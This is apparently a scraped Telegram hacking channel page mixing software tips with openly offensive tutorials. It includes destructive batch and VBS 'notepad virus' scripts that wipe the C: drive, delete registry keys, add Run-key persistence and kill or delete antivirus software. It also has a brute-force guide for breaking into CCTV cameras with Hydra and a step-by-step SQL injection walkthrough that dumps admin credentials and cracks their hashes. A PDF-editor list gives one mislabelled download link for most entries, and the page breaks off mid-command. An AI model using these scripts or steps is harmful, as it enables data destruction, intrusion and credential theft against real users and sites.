UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.9K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
- - - - - - เธขเธ เน”ั”ะณฯ‚เนเน”ั”- - - - - -

๐Ÿฆ‘ Set window on top, make it dark, transparent and more auto customize (For all Windows Version):
Paid theme For Free In UnderCode:
(follow us Twitter.com/UnderCodeTC)

๐Ÿฆ‘๐Ÿ„ป๐Ÿ„ด๐Ÿ…ƒ ๐Ÿ…‚ ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ…๐Ÿ…ƒ:

1) Download https://github.com/gileli121/WindowTop-Web-Installer/releases/tag/05-31-19

2)The installer will also download for you offline installer.

3) You can use the software in 2 ways:

*Download Autoit and run the WindowTop.au3 file as it is

*Download compiled exe file of the software

๐Ÿฆ‘๐Ÿ…ƒ๐Ÿ„ด๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ด๐Ÿ„ณ ๐Ÿ„ฑ๐Ÿ…ˆ ๐Ÿ…„๐Ÿ„ฝ๐Ÿ„ณ๐Ÿ„ด๐Ÿ…๐Ÿ„ฒ๐Ÿ„พ๐Ÿ„ณ๐Ÿ„ด ๐Ÿ„พ๐Ÿ„ฝ:

1)Windows 10

2)Windows 7


๐Ÿฆ‘Trouble in Install
>https://youtu.be/En9JtAn8nRY

ENJOY ๐Ÿ˜Š


@ฬถฬอŠอœฬซฬฑ ฬธฬ›อ  ฬฬนฬžฬปฬฉฬฒMฬถฬ†ฬ„อ˜อ„ฬ•ฬ›ฬชฬฐฬปอŽฬผrฬตฬ‡อƒอšฬฆฬ˜ฬฆอ…อ‡อ‡อ…ฬฃอ”.ฬถฬฬŽ อ›ออ‚ฬฉฬŸฬœอœฬŸอ“ ฬดฬฬ€อ ฬ‰อ‘ฬšฬ“ออ›ฬˆฬ™อ“ฬฆฬซฬฒฬฏอ…ฬจBฬตฬ… ฬนoฬตอ’ฬอฬ“ฬอ’ฬฝฬฝฬอ›ฬžอ‡ฬ ฬ ฬœtฬท ฬ›อ‘อ—อ€ฬฒฬฒnฬถฬอŒฬ’ฬ› ฬอ“อŽฬฐฬปฬฆeฬดอ‘ฬ†อ„ฬ…อ›อ„ฬฬ tฬดฬŽฬ“อ อŒฬ อ…ฬฌอ–ฬฎอˆอˆอ‡(ฬตอ’อ„ฬฝอ„ฬ อ‰อˆฬนฬจฬžอ–tฬด อ’ฬฝอ„ฬฝฬ’ฬ€ฬ•อฬ’ฬน.ฬธอ„ฬอ’อ“ฬญฬจmฬถฬ’ ฬ‘อ–อ‡อšฬข.ฬทฬ‘ฬอ‹ฬŽฬชฬฉฬฌฬฃฬฌ

- - - - - - เธขเธ เน”ั”ะณฯ‚เนเน”ั”- - - - -
- - - - - - -Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰ - - - - - -

๐Ÿฆ‘โ–‘Hโ–‘oโ–‘wโ–‘ โ–‘Cโ–‘rโ–‘eโ–‘aโ–‘tโ–‘eโ–‘ โ–‘Dโ–‘aโ–‘nโ–‘gโ–‘eโ–‘rโ–‘oโ–‘uโ–‘sโ–‘ โ–‘Vโ–‘iโ–‘rโ–‘uโ–‘sโ–‘ โ–‘bโ–‘yโ–‘ โ–‘uโ–‘nโ–‘dโ–‘eโ–‘rโ–‘cโ–‘Oโ–‘dโ–‘eโ–‘:
(Facebook.com/UnderCodeTestingCompanie)

๐Ÿฆ‘For this tutorial to create simple Notepad Virus you donโ€™t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand whatโ€™s going on here. So letโ€™s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.

๐Ÿฆ‘๐ฅ๐ž๐ญ ๐ฌ ๐’๐ญ๐š๐ซ๐ญ:

1)Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given Written below one by one for the different virus in a different file.

>Code :
@Echo off
Del C: \ *.* || y

>Copy (Ctrl+C) and Paste (Ctrl+V) the source code)

2) I am not responsible for any damage or error reporting on Your PC, do it at your own risk.

3)๐˜พ๐™ค๐™™๐™š๐™จ:

A) Disable Internet Permanently

>This code will disable the internet connectivity permanently.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

B) Delete Key Registry Files

This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

C) Endless Notepads

T>his will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(โ€WMPlayer.OCX.7โ€ณ)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count โ€“ 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count โ€“ 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

D) โ–‘Eโ–‘nโ–‘dโ–‘lโ–‘eโ–‘sโ–‘sโ–‘ โ–‘Eโ–‘nโ–‘tโ–‘eโ–‘rโ–‘ โ–‘Uโ–‘nโ–‘dโ–‘eโ–‘rโ–‘Cโ–‘oโ–‘dโ–‘eโ–‘

This will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(โ€WScript.Shellโ€)
do
wscript.sleep 100
wshshell.sendkeys โ€œ~(enter)โ€
loop

E) Application Bomber

It will start to open different applications repeatedly which will affect the systemโ€™s performance.

You can also add the application of your choice in the above code.

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

F)Folder Flooder

This will create unlimited no. of folders.

@echo off
:x
md %random%
/folder.
goto x

G)User Account Flooder

This will create large no. of the user account on oneโ€™s PC and goes on

@echo off
:xnet
user %random% /add
goto x

H) Process Creator

This will create unlimited background processes

%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable

@Echo off
Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop โ€œSecurity Centerโ€
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem

@ฬธอ†อ‘อฬŽอ‘อ˜อ˜ฬ†อ…อ‡ฬฑฬ˜ ฬถอ„ฬคฬฒฬฐฬฒฬกฬ—ฬœMฬธฬƒฬ‚ฬ„อ‡ฬชฬœrฬตฬ‹อ—ฬ€ฬŽ ฬ€ฬŒออ„ฬŸอ…อœอ–ฬซฬ™ฬชอ–ฬฅฬฆ.ฬธฬŒอ‹อ—ฬ„ฬ…อฬพฬŒฬ›ฬฑฬ˜ฬฬง ฬท ฬˆฬฝอ†ฬ‹ฬฆฬซฬฏฬปฬปฬงฬฎฬœBฬดฬŽฬฬˆฬอ˜อ‚ฬญอ•อ…ฬฒฬฒฬฒ oฬทอ†อ…อ“อ“ฬฃฬคtฬทอ‘อ ฬ“ฬ“ฬ›อ’ฬœฬนฬฐฬœฬฆฬ  ฬผฬฒฬนNฬตอŠอ‚อ„ฬฝฬฉฬฐอœฬขฬ eฬถอŠอ„อŒอ‘อ„ฬ•ฬŽฬ†ฬšอฬฒอ™ฬงtฬถอ‚อ ฬ‹ฬ€อƒ ฬอ‹อ“ ฬถฬฝฬŒอฬ•ฬพฬอ™ฬžฬฉฬจฬžฬ–(ฬตอ˜ฬฉอŽอˆฬนอšอ‡ฬ˜อ™tฬดอ„ฬ€ฬšอŠฬฬŸอ‡ ฬผฬฅฬฎ.ฬธออŠอœฬ˜ฬ—อŽmฬทอ† อŠอ›ฬˆฬพอ ฬชอ”ฬœฬน.ฬถออ‚อ„ฬ”ฬ€อ„ฬ’ฬฏฬฅอšฬฉ)ฬทฬฬ‘ฬอ„ฬ’ฬนอ•ฬฃฬ™อ™ฬฒฬญ

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
FULL GUIDE PROGRAMMING NOT NOT NESSASARY CREATE DANGEROUS VIRUS NOTPADโ˜ ๏ธ
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘หœโ€*ยฐโ€ข.หœโ€*ยฐโ€ข Android-Exploits Tested โ€ขยฐ*โ€หœ.โ€ขยฐ*โ€หœ
U P D A T E D :
(twitter.com/UnderCodeTC)

๐Ÿฆ‘โ–‘Iโ–‘nโ–‘sโ–‘tโ–‘aโ–‘lโ–‘lโ–‘iโ–‘sโ–‘aโ–‘tโ–‘iโ–‘oโ–‘nโ–‘ โ–‘&โ–‘ โ–‘Rโ–‘uโ–‘nโ–‘:โ–‘

1) git clone https://github.com/sundaysec/Android-Exploits.git

2) Recommend you grab exploitpack latest version

>wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

4) java -jar ExploitPack.jar

5) Load the exploits

๐Ÿฆ‘ OWASP Top 10 Mobile Risks On Rooted Android Should Carring:


1_Insecure Data Storage
2_Weak Server Side Controls
3_Insufficient Transport Layer Protection
4_Client Side Injection
5-Poor Authorization and Authentication
6_Improper Session Handling
7_Security Decisions Via Untrusted Inputs
8_Side Channel Data Leakage
9-Broken Cryptography
10-Sensitive Information Disclosure

ลดแ–‡๏ผฉแต—แต—ั”๏ฝŽ แต‡ะŽ ๐“‚ล˜. ๐”Ÿแต’ลฆ๐งแต‰ั‚ (๐“ฃ.โ“‚๏ธ.)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Hack Any CctV Camera by undercOde:
(t.me/UnderCodeTestingofficiaL)

๐Ÿฆ‘๐•ด๐–“๐–˜๐–™๐–†๐–‘๐–‘๐–Ž๐–˜๐–†๐–™๐–Ž๐–”๐–“ ๐–†๐–“๐–‰ ๐•ฝ๐–š๐–“:

1) All You need is going inside same network
(example same netprovider or same wifi or wlan network simply go inside same wifi or wlan connected to Camera)

2) Get any Ip Scanner to locate and get the Cam ip
both simple tools work to parrot ubanto or kali and avaible for major os platform and both avaible on github

3)Choose Ip Address Range
Before sanning with arp-scan or angry ip
Choose ip range so go to browser and type what is my ip

4) it s show your public ip
Example here my ip is 213.204.114.62 in Lebanon

So i choose ip range 213.204.114.1
and 213.204.114.200

๐Ÿฆ‘5) Now :
Go to tools > Preferences > Ports | add ports 80,8080,23 in Port selection tab
It will scan 80,8080 and 23 port.


6) Any ip detection tool (webdetect) will help avaible per default on wireshark or can allow in settings of angryip scanner to show the camera ip

>CCTV camera model name, camera name

7) Now start scan

8) After choosing ip if you lucky for major camera you get default login of any Camera TheN DONE
if not:
Open Hydra The famous bryte force tool :
Type
hydra -s 80 -l admin -P /root/ THEN DIR LOCATION -e ns -t targetIP http*
(LOGIN SITE NAME )

9) Now hydra done we have password login

again open cam login and put name & Pass

>ENJOY THIS ONE ON ANY PRIVATE OR PUBLIC CAMERA
๐Ÿฆ‘Any doubt Check This videohttps://youtu.be/FaNOVUoHQ0w

ลดแ–‡๏ผฉแต—แต—ั”๏ฝŽ แต‡ะŽ ๐“‚ล˜. ๐”Ÿแต’ลฆ๐งแต‰ั‚ (๐“ฃ.โ“‚๏ธ.)
โ– โ–‚ โ–„ โ–… ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–… โ–„ โ–‚ โ–
- - - - - - โ“Šโ“ƒโ’นโ’บโ“‡โ’ธโ“„โ’นโ’บ- - - - - -

๐Ÿฆ‘BUILD GAMES APK EASY WITH TERMUX:
RECENTLY WE SHARE MANY TOOLS FOR BUILD APK ON TERMUX IN undercOde BY THIS NEW REPO SPECIAL FOR GAME APK BUILD USING TERMUX :
(t.me/UnderCodeTestingofficial)

๐Ÿฆ‘๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ:

1) cd && git clone https://github.com/sdrausty/buildAPKs

2) cd buildAPKs

3) git submodule init

4) git submodule update sources/games

5) ENJOY

@ฬทฬอ— ฬƒฬ„ฬฃฬฉฬœฬฎอ”ฬบฬงฬปฬ™ฬฑ ฬถฬ’ฬœฬฒฬฐฬชMฬทฬ”ฬ“ฬŽอ€ ฬฬฑอ•อ”ฬกฬ อˆฬฒอ“อ™rฬธฬƒฬ†ออ˜ฬ…อ›ฬพฬฌฬ ฬฑอ‰ฬฑฬŸ.ฬธฬšฬ‰ฬ„อƒอ› ฬ‹อ„ฬ‘อ—ฬ–ฬฑอ…ฬฃอฬกฬชอ™ฬ– ฬธอ‚อฬฬจฬฌฬฑอšBฬตอ€อ„อ‚อƒฬฝออ„อ—ฬ†ฬ ฬ—oฬตฬ•อฬ…ฬ‘อ—ฬ†ฬ‡ฬฐฬœอ•ฬจอˆฬผฬ ฬฉฬžฬ–tฬทอฬ“ฬ‡อ—ฬ‹อ’อ—ฬฅฬกฬฐฬซNฬถอฬ‰อ‹ฬ”ฬ‹ฬฝอŒอ„ฬอ•ฬฉฬŸeฬดฬ’ฬฬ‹ฬ‹ออ‹อ€อ™อ‡อšฬซฬ˜อšอ‰ฬค อ”tฬดฬ‰ออ˜อ–อ…อ‰ฬบอ”ฬŸฬ™อ–

- - - - - -โ“Šโ“ƒโ’นโ’บโ“‡โ’ธโ“„โ’นโ’บ- - - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
๐Ÿฆ‘HACK WIFI ,WEBSITES ,INFORMATION GETHERING, SNIFFING, SPOOFING ,,,MORE...
ALL ON TERMUX:
(intagram.com/UnderCodetestingCompany)

๐Ÿฆ‘Iฬพnฬพsฬพtฬพaฬพlฬพlฬพaฬพtฬพiฬพoฬพnฬพ ฬพiฬพnฬพ ฬพLฬพiฬพnฬพuฬพxฬพ ฬพ

1) Must Run As ROOT For major tools:

2)git clone https://github.com/thehackingsage/hacktronian.git

3)cd hacktronian

4)chmod +x install.sh

5)./install.sh

6)That's it.. you can execute tool by typing hacktronian

๐Ÿฆ‘

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py
Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

@ฬทฬอ— ฬƒฬ„ฬฃฬฉฬœฬฎอ”ฬบฬงฬปฬ™ฬฑ ฬถฬ’ฬœฬฒฬฐฬชMฬทฬ”ฬ“ฬŽอ€ ฬฬฑอ•อ”ฬกฬ อˆฬฒอ“อ™rฬธฬƒฬ†ออ˜ฬ…อ›ฬพฬฌฬ ฬฑอ‰ฬฑฬŸ.ฬธฬšฬ‰ฬ„อƒอ› ฬ‹อ„ฬ‘อ—ฬ–ฬฑอ…ฬฃอฬกฬชอ™ฬ– ฬธอ‚อฬฬจฬฌฬฑอšBฬตอ€อ„อ‚อƒฬฝออ„อ—ฬ†ฬ ฬ—oฬตฬ•อฬ…ฬ‘อ—ฬ†ฬ‡ฬฐฬœอ•ฬจอˆฬผฬ ฬฉฬžฬ–tฬทอฬ“ฬ‡อ—ฬ‹อ’อ—ฬฅฬกฬฐฬซNฬถอฬ‰อ‹ฬ”ฬ‹ฬฝอŒอ„ฬอ•ฬฉฬŸeฬดฬ’ฬฬ‹ฬ‹ออ‹อ€อ™อ‡อšฬซฬ˜อšอ‰ฬค อ”tฬดฬ‰ออ˜อ–อ…อ‰ฬบอ”ฬŸฬ™อ–

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
Forwarded from UNDERCODER
LEARN C PROGRAMMING FULL UNDERCODE.pdf
1.7 MB
Forwarded from UNDERCODER
Android-Programming-Cookbook UNDERCODe.pdf
8.4 MB
Forwarded from UNDERCODER
ANDROID DEVELOPPERS COURSE UNDERCODE.pdf
16.1 MB
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘ ๐–‡๐–Š๐–˜๐–™ ๐–•๐–‰๐–‹ ๐–Š๐–‰๐–Ž๐–™๐–”๐–— ๐–†๐–•๐–•๐–˜ ๐–‹๐–”๐–— ๐–œ๐–Ž๐–“๐–‰๐–”๐–œ๐–˜, ๐–’๐–†๐–ˆ & ๐–‘๐–Ž๐–“๐–š๐– &
(instagram.com/UnderCodetestingCompany)

๐Ÿฆ‘
1) Sejda (Web, Windows, Mac, Linux) to edit text and create PDF forms for free

>https://www.sejda.com/pdf-editor

2) Xodo (Web, Android, iOS, Windows) to annotate and collaborate on PDFs anywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe

3) CloudConvert (Web) to turn PDF files into editable Word documents

>https://zapier.com/blog/best-pdf-editor-apps/


4) Foxit (Web, Android, iOS, Windows, Mac) to edit PDFs everywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe


5) Preview (Mac) to rearrange pages, sign documents, and mark up PDFs for free

> https://support.apple.com/en-us/HT201740?utm_source=zapier.com&utm_medium=referral&utm_campaign=zapier

6) PDF Expert (iOS, Mac) to quickly edit PDF text and images

>http://download.wondershare.net/pdfelement-pro_full5261.exe

7) PDFelement (Android, iOS,Windows, Mac) to edit PDFs and add forms in an Office-like editor

>http://download.wondershare.net/pdfelement-pro_full5261.exe

8) Adobe Acrobat (Windows, Mac) to create detailed PDFs and forms

>http://download.wondershare.net/pdfelement-pro_full5261.exe

ลดแ–‡๏ผฉแต—แต—ั”๏ฝŽ แต‡ะŽ ๐“‚ล˜. ๐”Ÿแต’ลฆ๐งแต‰ั‚ (๐“ฃ.โ“‚๏ธ.)

โ– โ–‚ โ–„ โ–… ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–… โ–„ โ–‚ โ–[
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘โ„๐•’๐•”๐•œ ๐•จ๐•–๐•“๐•ค๐•š๐•ฅ๐•– ๐••๐•’๐•ฅ๐•’๐•“๐•’๐•ค๐•– ๐•˜๐•ฆ๐•š๐••๐•– ๐•“๐•ช ๐•Œ๐•Ÿ๐••๐•–๐•ฃโ„‚๐• ๐••๐•–:


๐Ÿฆ‘Website Database Like:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

๐Ÿฆ‘๐Ÿ„ป๐Ÿ„ด๐Ÿ…ƒ ๐Ÿ…‚ ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ…๐Ÿ…ƒ:


1) Finding vulnerable websites:
Can get alot google search or get many from deepweb & Google combine

> github.com/UnderCodeTestingC/Vulnerables-Sites

2) Examples sites: (sql)

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

3)Checking for Vulnerability on the website

EXAMPLE:

> h**p://www.site.com/products.php?id=7


๐Ÿฆ‘To test this URL, we add a quote to it โ€˜

> h**p://www.site.com/products.php?id=7โ€™


4) On executing it, if we get an error like this: โ€œYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etcโ€ฆโ€Or something like that,

> that means the target website is vulnerable to sql injection and you can hack it.

5) Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

> h**p://www.site.com/products.php?id=5 order by 1/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 2/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 3/* โ€“> no error

> h**p://www.site.com/products.php?id=5 order by 4/* โ€“> Error (we get message like this Unknown column โ€˜4โ€™ in โ€˜order clauseโ€™ or something like that)

that means that the it has 3 columns, cause we got an error on.

7) Check for UNION function

With union we can select more data in one sql statement.

So in same example site:

> h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )

>!if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

8) Check MySQL version


h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try โ€”
itโ€™s a comment and itโ€™s important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error โ€œunion + illegal mix of collations (IMPLICIT + COERCIBLE) โ€ฆโ€

I didnโ€™t see any paper covering this problem, so i must write it .
What we need is convert() function
i.e.
h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

h**p://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


9) Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12โ€ฆ) <โ€” later i will describe for MySQL greater than 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s โ€ฆ

10) common column names are: username, user, usr, user_name, password, pass, passwd, pwd etcโ€ฆ
i.e would be

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and thatโ€™s good )

table admin existsโ€ฆ

11) Now to check column names.

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etcโ€ฆ

12) now to check if column password exists

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1โ€ฆ
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*


>t.me/UnderCodeTestingOfficial

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

13) Now we get displayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If canโ€™t guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*


14) To get tables we use table_name and information_schema.tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

15) Here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*


16) note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1

i.e

๐Ÿฆ‘
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

17) Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etcโ€ฆ

To get the column names the method is the same.

Here we use column_name and information_schema.columns


18 ) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


19) Crack the password with the help of a site:
Download::

http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php

> DONT COPY OUR TuTorial ๐ŸŒš

๐“ฆ๐“ป๐“ฒ๐“ฝ๐“ฝ๐“ฎ๐“ท ๐“ซ๐”‚ ๐“œ๐“ป. ๐“‘๐“ธ๐“ฝ๐“๐“ฎ๐“ฝ (๐“ฝ.๐“ถ.)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
โ˜…FULL GUIDE 19 STEPS HACK ANY WEBSITE SQL FOR NEWBIES & EXPERTSโ˜…
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘๐”ป๐• ๐•”๐•œ๐•–๐•ฃ๐•”๐•ฃ๐•’๐•—๐•ฅ ๐”ฝ๐• ๐•ฃ ๐”ธ๐•Ÿ๐•ช ๐•ƒ๐•š๐•Ÿ๐•ฆ๐•ฉ ๐”ป๐•š๐•ค๐•ฅ๐•ฃ๐•  ๐•†๐•Ÿ๐•– ๐•†๐•— ๐”พ๐•š๐•ฅ๐•™๐•ฆ๐•“ ๐•‹๐• ๐•ก๐•š๐•” ๐•จ๐•š๐•ฅ๐•™ ๐Ÿ๐•œ ๐•ค๐•ฅ๐•’๐•ฃ๐•ค:
+ Free Minecraft Docker client On Their Servers , to visualize and manage Docker containers:
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘๐™„๐™‰๐™Ž๐™๐˜ผ๐™‡๐™‡๐™„๐™Ž๐˜ผ๐™๐™„๐™Š๐™‰ & ๐™๐™๐™‰ :

1) You can Download Minecraft from here :
>https://minecraft.net/

Or Simply Type in Terminal

> git clone git@github.com:docker/dockercraft.git

2) docker build -t gaetan/dockercraft dockercraft

3) docker run -t -i -d -p 25565:25565 \

